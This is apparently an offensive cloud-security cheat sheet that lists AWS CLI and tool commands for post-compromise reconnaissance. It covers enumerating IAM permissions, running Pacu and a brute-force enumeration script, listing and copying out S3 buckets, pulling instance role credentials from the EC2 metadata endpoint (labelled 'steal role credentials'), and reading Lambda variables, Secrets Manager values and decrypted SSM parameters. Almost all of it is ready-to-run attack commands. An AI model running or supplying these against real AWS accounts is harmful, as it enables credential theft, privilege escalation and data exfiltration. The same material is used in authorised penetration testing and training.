Setup
aws configure
# Access Key ID: AKIAIOSFODNN7EXAMPLE
# Secret Access Key: wJalrXUtnFEMI/K7MDENG
# Region: us-east-1
aws sts get-caller-identity # verify which identity you have
IAM Enumeration
# Current user's permissions
aws iam get-user
aws iam list-attached-user-policies --user-name USERNAME
aws iam list-user-policies --user-name USERNAME
# Read policy documents
aws iam get-policy --policy-arn ARN
aws iam get-policy-version --policy-arn ARN --version-id v1
# Enumerate all users and roles (if permitted)
aws iam list-users
aws iam list-roles
Automated Enumeration
# enumerate-iam โ brute force all accessible API calls
git clone https://github.com/andresriancho/enumerate-iam
python3 enumerate_iam.py --access-key KEY --secret-key SECRET
# Pacu โ AWS exploitation framework
python3 pacu.py
set_keys
run iam__enum_users_roles_policies_groups
run iam__privesc_scan
S3 Enumeration
# List all accessible buckets
aws s3 ls
# List and download bucket contents
aws s3 ls s3://target-bucket --recursive
aws s3 sync s3://target-bucket ./local-copy
# Check bucket policies and ACLs
aws s3api get-bucket-policy --bucket BUCKET
aws s3api get-bucket-acl --bucket BUCKET
EC2 & Metadata
# List instances with their roles
aws ec2 describe-instances --query 'Reservations[].Instances[].{ID:InstanceId,IP:PublicIpAddress,Role:IamInstanceProfile}'
# From inside EC2: steal role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Find publicly exposed security groups
aws ec2 describe-security-groups | grep -A5 "0.0.0.0/0"
Lambda & Secrets
# Lambda functions (environment variables often contain secrets)
aws lambda list-functions
aws lambda get-function-configuration --function-name FUNC
# Secrets Manager and Parameter Store
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id SECRET_ARN
aws ssm get-parameter --name PARAM_NAME --with-decryption